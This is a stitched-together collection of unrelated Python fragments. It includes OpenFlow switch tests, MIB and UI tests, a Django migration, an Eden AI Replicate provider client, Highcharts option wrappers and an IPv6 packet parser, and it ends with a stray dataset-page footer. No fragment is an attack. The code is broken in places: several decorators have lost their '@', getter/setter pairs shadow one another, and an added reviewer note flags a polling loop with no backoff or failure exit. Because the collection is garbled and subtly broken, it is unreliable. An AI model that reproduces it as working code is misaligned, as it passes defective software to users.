def verify_flow_removed_idle_timeout(self, dp, msg):
    return self._verify_flow_removed(dp, msg)
def test_flow_removed_idle_timeout_hit(self, dp):
    """Hit the flow once after *sleep* seconds so idle expiry restarts.

    Fix: the OFPPacketOut constructor was missing its buffer_id argument
    (a syntax error); 0xffffffff (OFP_NO_BUFFER) is correct here.
    """
    reason = dp.ofproto.OFPRR_IDLE_TIMEOUT
    idle_timeout = 5
    in_port = 1
    sleep = 2
    self._add_flow_flow_removed(dp, reason, in_port=in_port, idle_timeout=idle_timeout)
    # The hit resets the idle timer, so total lifetime grows by `sleep`.
    self._verify['timeout'] = (idle_timeout + sleep)
    time.sleep(sleep)
    output = dp.ofproto.OFPP_TABLE
    actions = [dp.ofproto_parser.OFPActionOutput(output, 0)]
    m = dp.ofproto_parser.OFPPacketOut(dp, 0xffffffff, in_port, actions, None)
    dp.send_msg(m)
def verify_flow_removed_idle_timeout_hit(self, dp, msg):
    return self._verify_flow_removed(dp, msg)
def test_flow_removed_hard_timeout(self, dp):
    # Hard timeout fires regardless of traffic.
    reason = dp.ofproto.OFPRR_HARD_TIMEOUT
    hard_timeout = 2
    self._add_flow_flow_removed(dp, reason, hard_timeout=hard_timeout)
def verify_flow_removed_hard_timeout(self, dp, msg):
    return self._verify_flow_removed(dp, msg)
def test_flow_removed_hard_timeout_hit(self, dp):
    """Hit the flow mid-lifetime; hard expiry must NOT be extended.

    Fix: the OFPPacketOut constructor was missing its buffer_id argument
    (a syntax error); 0xffffffff (OFP_NO_BUFFER) is correct here.
    """
    reason = dp.ofproto.OFPRR_HARD_TIMEOUT
    hard_timeout = 5
    in_port = 1
    sleep = 2
    self._add_flow_flow_removed(dp, reason, in_port=in_port, hard_timeout=hard_timeout)
    dp.send_barrier()
    time.sleep(sleep)
    output = dp.ofproto.OFPP_TABLE
    actions = [dp.ofproto_parser.OFPActionOutput(output, 0)]
    m = dp.ofproto_parser.OFPPacketOut(dp, 0xffffffff, in_port, actions, None)
    dp.send_msg(m)
def verify_flow_removed_hard_timeout_hit(self, dp, msg):
    return self._verify_flow_removed(dp, msg)
def test_flow_removed_delete(self, dp):
    # Explicit delete must also trigger FlowRemoved (OFPRR_DELETE).
    reason = dp.ofproto.OFPRR_DELETE
    self._add_flow_flow_removed(dp, reason)
    dp.send_barrier()
    self.delete_all_flows(dp)
def verify_flow_removed_delete(self, dp, msg):
    return self._verify_flow_removed(dp, msg)
def test_flow_removed_table_id(self, dp):
    # Same as above but in a non-zero table; table_id is echoed back.
    reason = dp.ofproto.OFPRR_DELETE
    table_id = 1
    self._add_flow_flow_removed(dp, reason, table_id=table_id)
    dp.send_barrier()
    self.delete_all_flows(dp)
def verify_flow_removed_table_id(self, dp, msg):
    return self._verify_flow_removed(dp, msg)
def _send_packet_out(self, dp, buffer_id=0xffffffff, in_port=None, output=None, data=''):
    """Send a PacketOut and record in_port/data for _verify_packet_in.

    Fix: the buffer_id default was truncated to `buffer_id=,` (a syntax
    error); 0xffffffff (OFP_NO_BUFFER) matches how the other packet-out
    helpers in this tester behave.
    """
    if (in_port is None):
        in_port = dp.ofproto.OFPP_LOCAL
    if (output is None):
        output = dp.ofproto.OFPP_CONTROLLER
    self._verify['in_port'] = in_port
    self._verify['data'] = data
    actions = [dp.ofproto_parser.OFPActionOutput(output, len(data))]
    m = dp.ofproto_parser.OFPPacketOut(dp, buffer_id, in_port, actions, data)
    dp.send_msg(m)
def _verify_packet_in(self, dp, msg):
    """Compare every expected key in self._verify against the PacketIn.

    'in_port' is looked up in the OXM match fields; every other key is a
    plain attribute of the message.
    """
    for (name, val) in self._verify.items():
        if (name == 'in_port'):
            # Fix: r_val could be unbound (first iteration) or stale
            # (left over from a previous key) when the reply carries no
            # OXM_OF_IN_PORT field; initialize it explicitly.
            r_val = None
            for f in msg.match.fields:
                if (f.header == ofproto_v1_2.OXM_OF_IN_PORT):
                    r_val = f.value
        else:
            r_val = getattr(msg, name)
        if (val != r_val):
            return ('%s is mismatched. verify=%s, reply=%s' % (name, val, r_val))
    return True
def test_packet_in_action(self, dp):
    # Output-to-controller must produce a PacketIn with OFPR_ACTION.
    self._verify = {}
    self._verify['reason'] = dp.ofproto.OFPR_ACTION
    self._send_packet_out(dp)
def verify_packet_in_action(self, dp, msg):
    return self._verify_packet_in(dp, msg)
def test_packet_in_data(self, dp):
    # Payload sent out must be echoed back in the PacketIn.
    self._verify = {}
    self._verify['reason'] = dp.ofproto.OFPR_ACTION
    data = 'test'
    self._send_packet_out(dp, data=data)
def verify_packet_in_data(self, dp, msg):
    return self._verify_packet_in(dp, msg)
def test_packet_in_table_id(self, dp):
    # Route the packet table 0 -> goto table 2 -> controller, and check
    # that the PacketIn reports table_id == 2.
    in_port = 1
    table_id = 2
    output = dp.ofproto.OFPP_TABLE
    self._verify = {}
    self._verify['reason'] = dp.ofproto.OFPR_ACTION
    self._verify['table_id'] = table_id
    match = dp.ofproto_parser.OFPMatch()
    match.set_in_port(in_port)
    inst = [dp.ofproto_parser.OFPInstructionGotoTable(table_id)]
    self.mod_flow(dp, inst=inst, match=match)
    match = dp.ofproto_parser.OFPMatch()
    match.set_in_port(in_port)
    out = dp.ofproto.OFPP_CONTROLLER
    actions = [dp.ofproto_parser.OFPActionOutput(out, 0)]
    self.mod_flow(dp, actions=actions, match=match, table_id=table_id)
    dp.send_barrier()
    self._send_packet_out(dp, in_port=in_port, output=output)
def verify_packet_in_table_id(self, dp, msg):
    return self._verify_packet_in(dp, msg)
# NOTE(review): the bare `_ev_cls(...)` lines below look like decorators
# whose leading `@` was lost in extraction (Ryu's @set_ev_cls pattern) —
# confirm against the original source.
_ev_cls(ofp_event.EventOFPEchoReply, MAIN_DISPATCHER)
def echo_replay_handler(self, ev):
    # Only echo-request tests care about echo replies.
    if (self.current.find('echo_request') > 0):
        self.run_verify(ev)
_ev_cls(ofp_event.EventOFPStatsReply, MAIN_DISPATCHER)
def stats_reply_handler(self, ev):
    if (self.current is None):
        # Startup phase: the initial table-stats request completes here
        # and kicks off the first test.
        msg = ev.msg
        dp = msg.datapath
        if (self._verify == dp.ofproto.OFPST_TABLE):
            self.table_stats = msg.body
            self.start_next_test(dp)
    else:
        self.run_verify(ev)
_ev_cls(ofp_event.EventOFPSwitchFeatures, MAIN_DISPATCHER)
def features_replay_handler(self, ev):
    if (self.current is None):
        pass
    else:
        self.run_verify(ev)
_ev_cls(ofp_event.EventOFPGetConfigReply, MAIN_DISPATCHER)
def get_config_replay_handler(self, ev):
    self.run_verify(ev)
_ev_cls(ofp_event.EventOFPBarrierReply, MAIN_DISPATCHER)
def barrier_replay_handler(self, ev):
    # Barriers are used throughout for sequencing; only the dedicated
    # barrier test verifies the reply itself.
    if (self.current == 'test_barrier_request'):
        self.run_verify(ev)
_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
def port_status_handler(self, ev):
    pass
_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def packet_in_handler(self, ev):
    """EventOFPPacketIn: run verification only for packet-in tests.

    Fix: `self.current.find('packet_in')` was used as a bare truth value,
    but str.find() returns -1 (truthy!) when the substring is absent, so
    every non-packet_in test would wrongly verify stray PacketIn events.
    Compare explicitly, matching the sibling handlers' `> 0` style.
    """
    if (self.current.find('packet_in') > 0):
        self.run_verify(ev)
# NOTE(review): bare `_ev_cls(...)` lines — see note above; presumably
# stripped `@` decorators.
_ev_cls(ofp_event.EventOFPFlowRemoved, MAIN_DISPATCHER)
def flow_removed_handler(self, ev):
    if (self.current.find('flow_removed') > 0):
        self.run_verify(ev)
_ev_cls(ofp_event.EventOFPErrorMsg, MAIN_DISPATCHER)
def error_handler(self, ev):
    if (self.current.find('error') > 0):
        self.run_verify(ev)
def is_supported(self, t):
    """Return False when test name *t* matches a known-unsupported pattern.

    The blacklist is currently empty, so every test is supported.
    """
    unsupported = []
    return not any(t.find(u) != (- 1) for u in unsupported)
class ObjectTypeMibTableMultipleIndicesTestCase(unittest.TestCase):
    # NOTE(review): setUp parses self.__class__.__doc__ as MIB text — the
    # class docstring appears to have been stripped in this extraction;
    # the original presumably carried an ASN.1 MIB module here. Confirm
    # against the upstream pysmi test suite.
    def setUp(self):
        # Parse the MIB source, build a symbol table, generate pysnmp
        # code, and exec it against a fresh MibBuilder.
        ast = parserFactory()().parse(self.__class__.__doc__)[0]
        (mibInfo, symtable) = SymtableCodeGen().genCode(ast, {}, genTexts=True)
        (self.mibInfo, pycode) = PySnmpCodeGen().genCode(ast, {mibInfo.name: symtable}, genTexts=True)
        codeobj = compile(pycode, 'test', 'exec')
        self.ctx = {'mibBuilder': MibBuilder()}
        exec(codeobj, self.ctx, self.ctx)
    def testObjectTypeTableRowIndex(self):
        # A conceptual row indexed by two columns must expose both names.
        self.assertEqual(self.ctx['testEntry'].getIndexNames(), ((0, 'TEST-MIB', 'testIndex'), (0, 'TEST-MIB', 'testValue')), 'bad multiple table indices')
def test_model_to_dict(tresults, tbands):
    # peak_org as an int keeps at most that many peaks (NaN-padded);
    # peak_org as a Bands object labels peaks by band name.
    out = model_to_dict(tresults, peak_org=1)
    assert isinstance(out, dict)
    assert ('cf_0' in out)
    assert (out['cf_0'] == tresults.peak_params[(0, 0)])
    # Only one peak requested, so no second center frequency.
    assert (not ('cf_1' in out))
    out = model_to_dict(tresults, peak_org=2)
    assert ('cf_0' in out)
    assert ('cf_1' in out)
    assert (out['cf_1'] == tresults.peak_params[(1, 0)])
    out = model_to_dict(tresults, peak_org=3)
    # Requesting more peaks than exist pads with NaN.
    assert ('cf_2' in out)
    assert np.isnan(out['cf_2'])
    out = model_to_dict(tresults, peak_org=tbands)
    assert ('alpha_cf' in out)
def example():
    """Build a column showing the four TextField border variants."""
    underlined = ft.TextField(label='Underlined', border='underline', hint_text='Enter text here')
    underlined_filled = ft.TextField(label='Underlined filled', border=ft.InputBorder.UNDERLINE, filled=True, hint_text='Enter text here')
    borderless = ft.TextField(label='Borderless', border='none', hint_text='Enter text here')
    borderless_filled = ft.TextField(label='Borderless filled', border=ft.InputBorder.NONE, filled=True, hint_text='Enter text here')
    return ft.Column(controls=[underlined, underlined_filled, borderless, borderless_filled])
def router():
    """Build the sample routing table used by the router tests.

    Routes are registered in the exact original order, since insertion
    order can affect route-tree construction.
    """
    route_table = (
        ('/repos', 1),
        ('/repos/{org}', 2),
        ('/repos/{org}/{repo}', 3),
        ('/repos/{org}/{repo}/commits', 4),
        ('/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}', 5),
        ('/teams/{id}', 6),
        ('/teams/{id}/members', 7),
        ('/teams/default', 19),
        ('/teams/default/members/thing', 19),
        ('/user/memberships', 8),
        ('/emojis', 9),
        ('/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/full', 10),
        ('/repos/{org}/{repo}/compare/all', 11),
        ('/emojis/signs/0', 12),
        ('/emojis/signs/{id}', 13),
        ('/emojis/signs/42', 14),
        ('/emojis/signs/42/small.jpg', 23),
        ('/emojis/signs/78/small.png', 24),
        ('/emojis/signs/78/small(png)', 25),
        ('/emojis/signs/78/small_png', 26),
        ('/images/{id}.gif', 27),
        ('/repos/{org}/{repo}/compare/{usr0}:{branch0}...{usr1}:{branch1}/part', 15),
        ('/repos/{org}/{repo}/compare/{usr0}:{branch0}', 16),
        ('/repos/{org}/{repo}/compare/{usr0}:{branch0}/full', 17),
        ('/gists/{id}/{representation}', 21),
        ('/gists/{id}/raw', 18),
        ('/gists/first', 20),
        ('/item/{q}', 28),
        ('/cvt/teams/{id:int(min=7)}', 29),
        ('/cvt/teams/{id:int(min=7)}/members', 30),
        ('/cvt/teams/default', 31),
        ('/cvt/teams/default/members/{id:int}-{tenure:int}', 32),
        ('/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}...{usr1}:{branch1:int}/part', 33),
        ('/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}', 34),
        ('/cvt/repos/{org}/{repo}/compare/{usr0}:{branch0:int}/full', 35),
    )
    built = DefaultRouter()
    for template, resource_id in route_table:
        built.add_route(template, ResourceWithId(resource_id))
    return built
def test_horizontal_alignment_enum():
    # The enum value must round-trip: stored as the enum on the control,
    # serialized as its lowercase string value in the wire attributes.
    r = ft.Column(horizontal_alignment=ft.CrossAxisAlignment.STRETCH)
    assert isinstance(r.horizontal_alignment, ft.CrossAxisAlignment)
    assert isinstance(r._get_attr('horizontalAlignment'), str)
    cmd = r._build_add_commands()
    assert (cmd[0].attrs['horizontalalignment'] == 'stretch')
# NOTE(review): the bare `_meta(...)` call looks like a class decorator
# whose leading `@` was lost in extraction — confirm against the original.
_meta(characters.youmu.NitoryuuWearEquipmentAction)
class NitoryuuWearEquipmentAction():
    def sound_effect(self, act):
        # Play the dual-wield voice line only when equipping a second
        # weapon (the target already has a weapon equipped).
        card = act.card
        tgt = act.target
        equips = tgt.equips
        cat = card.equipment_category
        if ((cat == 'weapon') and [e for e in equips if (e.equipment_category == 'weapon')]):
            return 'thb-cv-youmu_nitoryuu'
def isFiltered(link, badwords, badcompounds):
    """Return True if *link* should be filtered out.

    A link is filtered when it is a data: URI, contains any single bad
    word, or contains every word of any bad-word compound (matching is
    case-insensitive; compound hits are logged to stdout).
    """
    if link.startswith('data:'):
        return True
    linkl = link.lower()
    # Generator expressions avoid materializing throwaway lists and let
    # any()/all() short-circuit.
    if any(badword in linkl for badword in badwords):
        return True
    if any(all(badword in linkl for badword in badcompound) for badcompound in badcompounds):
        print('Compound Filtered:', link, [badword for badword in badwords if (badword in linkl)])
        return True
    return False
class Migration(migrations.Migration):
    """Add db_index / help_text metadata to forum permission fields."""
    dependencies = [('forum_permission', '0001_initial')]
    operations = [migrations.AlterField(model_name='forumpermission', name='codename', field=models.CharField(db_index=True, max_length=150, unique=True, verbose_name='Permission codename')), migrations.AlterField(model_name='forumpermission', name='is_global', field=models.BooleanField(db_index=True, default=False, help_text='This permission can be granted globally to all the forums', verbose_name='Global permission')), migrations.AlterField(model_name='forumpermission', name='is_local', field=models.BooleanField(db_index=True, default=True, help_text='This permission can be granted individually for each forum', verbose_name='Local permission')), migrations.AlterField(model_name='groupforumpermission', name='has_perm', field=models.BooleanField(db_index=True, default=True, verbose_name='Has perm')), migrations.AlterField(model_name='userforumpermission', name='anonymous_user', field=models.BooleanField(db_index=True, default=False, verbose_name='Target anonymous user')), migrations.AlterField(model_name='userforumpermission', name='has_perm', field=models.BooleanField(db_index=True, default=True, verbose_name='Has perm'))]
class ReplicateApi(ProviderInterface, ImageInterface, TextInterface):
    """Eden AI provider implementation backed by the Replicate REST API."""
    provider_name = 'replicate'

    def __init__(self, api_keys: Dict={}):
        # NOTE: the mutable default dict is kept for interface
        # compatibility; it is never mutated here.
        api_settings = load_provider(ProviderDataEnum.KEY, provider_name=self.provider_name, api_keys=api_keys)
        self.headers = {'Content-Type': 'application/json', 'Accept': 'application/json', 'Authorization': f"Token {api_settings['api_key']}"}
        # Fix: the URL literal was truncated to a bare quote (syntax
        # error); Replicate's public REST root is /v1.
        self.base_url = 'https://api.replicate.com/v1'

    def __get_stream_response(self, url: str) -> Generator:
        """Yield ChatStreamResponse chunks from a server-sent-events URL."""
        headers = {**self.headers, 'Accept': 'text/event-stream'}
        response = requests.get(url, headers=headers, stream=True)
        last_chunk = ''
        for chunk in response.iter_lines():
            if (b'event: done' in chunk):
                response.close()
                break
            elif ((last_chunk == b'event: error') and chunk.startswith(b'data: ')):
                (yield ChatStreamResponse(text='[ERROR]', blocked=True, provider=self.provider_name))
            elif chunk.startswith(b'data: '):
                # Two consecutive bare "data: " lines encode a newline.
                if ((last_chunk == b'data: ') and (chunk == b'data: ')):
                    (yield ChatStreamResponse(text='\n', blocked=False, provider=self.provider_name))
                else:
                    (yield ChatStreamResponse(text=chunk.decode('utf-8').replace('data: ', ''), blocked=False, provider=self.provider_name))
            last_chunk = chunk

    # NOTE(review): the two "..." stubs below look like @overload
    # declarations whose decorators were lost in extraction; kept as-is
    # since they are harmlessly shadowed by the real definition.
    def __get_response(self, url: str, payload: dict, stream: Literal[True]) -> Generator:
        ...

    def __get_response(self, url: str, payload: dict, stream: Literal[False]) -> dict:
        ...

    def __get_response(self, url: str, payload: dict, stream: bool=False) -> Union[(Generator, dict)]:
        """Launch a prediction job, then stream it or poll to completion.

        Raises ProviderException on any non-success HTTP status.
        """
        if stream:
            payload['stream'] = True
        launch_job_response = requests.post(url, headers=self.headers, json=payload)
        try:
            launch_job_response_dict = launch_job_response.json()
        except requests.JSONDecodeError:
            raise ProviderException(launch_job_response.text, code=launch_job_response.status_code)
        if (launch_job_response.status_code != 201):
            raise ProviderException(launch_job_response_dict.get('detail'), code=launch_job_response.status_code)
        if stream:
            return self.__get_stream_response(launch_job_response_dict['urls']['stream'])
        url_get_response = launch_job_response_dict['urls']['get']
        response = requests.get(url_get_response, headers=self.headers)
        if (response.status_code >= 500):
            # Fix: the message argument was missing (syntax error).
            raise ProviderException(message='Internal Server Error', code=response.status_code)
        response_dict = response.json()
        if (response.status_code != 200):
            raise ProviderException(response_dict.get('detail'), code=response.status_code)
        status = response_dict['status']
        # NOTE(review): this polls with no sleep/backoff and no failure
        # exit when status becomes "failed"/"canceled" — consider both.
        while (status != 'succeeded'):
            response = requests.get(url_get_response, headers=self.headers)
            try:
                response_dict = response.json()
            except requests.JSONDecodeError:
                raise ProviderException(response.text, code=response.status_code)
            if (response.status_code != 200):
                raise ProviderException(response_dict.get('error', response_dict), code=response.status_code)
            status = response_dict['status']
        return response_dict

    def image__generation(self, text: str, resolution: Literal[('256x256', '512x512', '1024x1024')], num_images: int=1, model: Optional[str]=None) -> ResponseType[GenerationDataClass]:
        """Generate an image from *text* and return it base64-encoded."""
        url = f'{self.base_url}/predictions'
        size = resolution.split('x')
        version = get_model_id_image[model]
        payload = {'input': {'prompt': text, 'width': int(size[0]), 'height': int(size[1])}, 'version': version}
        # Cleanup: call the private helper through self rather than the
        # explicit class (identical via name mangling).
        response_dict = self.__get_response(url, payload)
        image_url = response_dict.get('output')
        if isinstance(image_url, list):
            image_url = image_url[0]
        image_bytes = base64.b64encode(requests.get(image_url).content)
        return ResponseType[GenerationDataClass](original_response=response_dict, standardized_response=GenerationDataClass(items=[GeneratedImageDataClass(image=image_bytes, image_resource_url=image_url)]))

    def text__chat(self, text: str, chatbot_global_action: Optional[str], previous_history: Optional[List[Dict[(str, str)]]], temperature: float, max_tokens: int, model: str, stream: bool=False) -> ResponseType[Union[(ChatDataClass, StreamChat)]]:
        """Run a chat completion, optionally streaming the reply.

        History is flattened into Llama-style [INST]...[/INST] prompt
        markup before submission.
        """
        url = f'{self.base_url}/predictions'
        model_id = get_model_id[model]
        prompt = ''
        if previous_history:
            for msg in previous_history:
                if (msg['role'] == 'user'):
                    prompt += (('\n[INST]' + msg['message']) + '[/INST]\n')
                else:
                    prompt += (('\n' + msg['message']) + '\n')
        prompt += (('\n[INST]' + text) + '[/INST]\n')
        payload = {'input': {'prompt': prompt, 'max_new_tokens': max_tokens, 'temperature': temperature, 'min_new_tokens': (- 1)}, 'version': model_id}
        if chatbot_global_action:
            payload['input']['system_prompt'] = chatbot_global_action
        response = self.__get_response(url, payload, stream=stream)
        if (stream is False):
            generated_text = ''.join(response.get('output', ['']))
            message = [ChatMessageDataClass(role='user', message=text), ChatMessageDataClass(role='assistant', message=generated_text)]
            standardized_response = ChatDataClass(generated_text=generated_text, message=message)
            return ResponseType[ChatDataClass](original_response=response, standardized_response=standardized_response)
        else:
            return ResponseType[StreamChat](original_response=None, standardized_response=StreamChat(stream=response))
class OptionSeriesTimelineDragdropDraghandle(Options):
    """Config wrapper for Highcharts series.timeline.dragDrop.dragHandle.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — this matches the @property / @<name>.setter pattern elsewhere
    in this codebase, and the decorators look stripped by extraction (as
    written, the later def simply shadows the earlier). Confirm against
    the original source.
    """
    def className(self):
        # Default CSS class for the drag handle.
        return self._config_get('highcharts-drag-handle')
    def className(self, text: str):
        self._config(text, js_type=False)
    def color(self):
        # Default fill color.
        return self._config_get('#fff')
    def color(self, text: str):
        self._config(text, js_type=False)
    def lineColor(self):
        return self._config_get('rgba(0, 0, 0, 0.6)')
    def lineColor(self, text: str):
        self._config(text, js_type=False)
    def lineWidth(self):
        return self._config_get(1)
    def lineWidth(self, num: float):
        self._config(num, js_type=False)
    def zIndex(self):
        return self._config_get(901)
    def zIndex(self, num: float):
        self._config(num, js_type=False)
def test_integration_parse_arg_outformat_csv(caplog):
    """Parsing ``--outformat csv`` must log that the csv outputter was chosen."""
    argv = [path.relpath(__file__), '--debug', '--outformat', 'csv']
    cis_audit.parse_arguments(argv=argv)
    # Any captured record with the expected message satisfies the check.
    assert any(
        record.msg == 'Going to use "csv" outputter'
        for record in caplog.records
    )
# NOTE(review): the bare ".parametrize(...)" line was a syntax error —
# restored the stripped "@pytest.mark" decorator prefix.
@pytest.mark.parametrize('params,sequence', ((FORWARD_0_to_5, (0, 1, 2, 3, 4, 5, 6)), (FORWARD_0_to_5, (0, 1, 3, 5, 6)), (FORWARD_0_to_5_SKIP_1, (0, 2, 4, 6)), (FORWARD_0_to_5_SKIP_1, (0, 2, 3, 4)), (FORWARD_0_to_5_SKIP_1, (0, 2, 3))))
def test_header_request_sequence_matching_unexpected(params, sequence):
    """Sequences that do not match the request parameters must be rejected."""
    validator = BlockHeadersValidator(*params)
    with pytest.raises(ValidationError, match='unexpected headers'):
        validator._validate_sequence(sequence)
class ipv6(packet_base.PacketBase):
    """IPv6 (RFC 2460) base-header encoder/decoder.

    An instance holds the 40-byte fixed header fields plus an optional
    chain of extension headers (``ext_hdrs``).  ``src``/``dst`` are kept
    in text form (see ``_TYPE``) and converted to/from the 16-byte wire
    form with ``addrconv``.
    """

    # ver/tc/flow (32b), payload length (16b), next header, hop limit,
    # 16-byte source, 16-byte destination.
    _PACK_STR = '!IHBB16s16s'
    _MIN_LEN = struct.calcsize(_PACK_STR)  # 40-byte fixed header
    # Maps a "next header" protocol number to the extension-header class
    # registered for it via register_header_type().
    _IPV6_EXT_HEADER_TYPE = {}
    _TYPE = {'ascii': ['src', 'dst']}

    @staticmethod
    def register_header_type(type_):
        """Return a class decorator registering an extension-header class
        under protocol number *type_*.

        NOTE(review): restored @staticmethod — the function takes no
        self/cls, and without the decorator instance-level access would
        bind the instance as *type_*.
        """
        def _register_header_type(cls):
            ipv6._IPV6_EXT_HEADER_TYPE[type_] = cls
            return cls
        return _register_header_type

    def __init__(self, version=6, traffic_class=0, flow_label=0,
                 payload_length=0, nxt=inet.IPPROTO_TCP, hop_limit=255,
                 src='10::10', dst='20::20', ext_hdrs=None):
        super(ipv6, self).__init__()
        self.version = version
        self.traffic_class = traffic_class
        self.flow_label = flow_label
        # 0 means "compute from payload + ext headers at serialize time".
        self.payload_length = payload_length
        self.nxt = nxt
        self.hop_limit = hop_limit
        self.src = src
        self.dst = dst
        ext_hdrs = ext_hdrs or []
        assert isinstance(ext_hdrs, list)
        for ext_hdr in ext_hdrs:
            assert isinstance(ext_hdr, header)
        self.ext_hdrs = ext_hdrs

    @classmethod
    def parser(cls, buf):
        """Parse *buf* into ``(ipv6 instance, payload parser, rest)``.

        Walks the extension-header chain as far as registered header
        classes allow; the first unregistered "next header" value ends
        the chain and selects the payload protocol.

        NOTE(review): restored @classmethod — the body uses ``cls`` and
        the packet framework invokes parser on the class.
        """
        (v_tc_flow, payload_length, nxt, hlim, src, dst) = struct.unpack_from(cls._PACK_STR, buf)
        version = v_tc_flow >> 28
        traffic_class = (v_tc_flow >> 20) & 255
        flow_label = v_tc_flow & 1048575
        hop_limit = hlim
        offset = cls._MIN_LEN
        last = nxt
        ext_hdrs = []
        while True:
            cls_ = cls._IPV6_EXT_HEADER_TYPE.get(last)
            if not cls_:
                break
            hdr = cls_.parser(buf[offset:])
            ext_hdrs.append(hdr)
            offset += len(hdr)
            last = hdr.nxt
        msg = cls(version, traffic_class, flow_label, payload_length,
                  nxt, hop_limit,
                  addrconv.ipv6.bin_to_text(src),
                  addrconv.ipv6.bin_to_text(dst),
                  ext_hdrs)
        return (msg, ipv6.get_packet_type(last), buf[offset:(offset + payload_length)])

    def serialize(self, payload, prev):
        """Serialize the header (and extension headers) to wire format.

        If ``payload_length`` is 0 it is computed as
        len(payload) + sum of extension-header lengths, and patched into
        the already-packed buffer.
        """
        hdr = bytearray(40)
        v_tc_flow = ((self.version << 28) | (self.traffic_class << 20)) | self.flow_label
        struct.pack_into(ipv6._PACK_STR, hdr, 0, v_tc_flow,
                         self.payload_length, self.nxt, self.hop_limit,
                         addrconv.ipv6.text_to_bin(self.src),
                         addrconv.ipv6.text_to_bin(self.dst))
        if self.ext_hdrs:
            for ext_hdr in self.ext_hdrs:
                hdr.extend(ext_hdr.serialize())
        if 0 == self.payload_length:
            payload_length = len(payload)
            for ext_hdr in self.ext_hdrs:
                payload_length += len(ext_hdr)
            self.payload_length = payload_length
            # Patch the length field (bytes 4-5) in place.
            struct.pack_into('!H', hdr, 4, self.payload_length)
        return hdr

    def __len__(self):
        # Fixed header plus the total length of the extension chain.
        return self._MIN_LEN + sum(len(ext_hdr) for ext_hdr in self.ext_hdrs)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.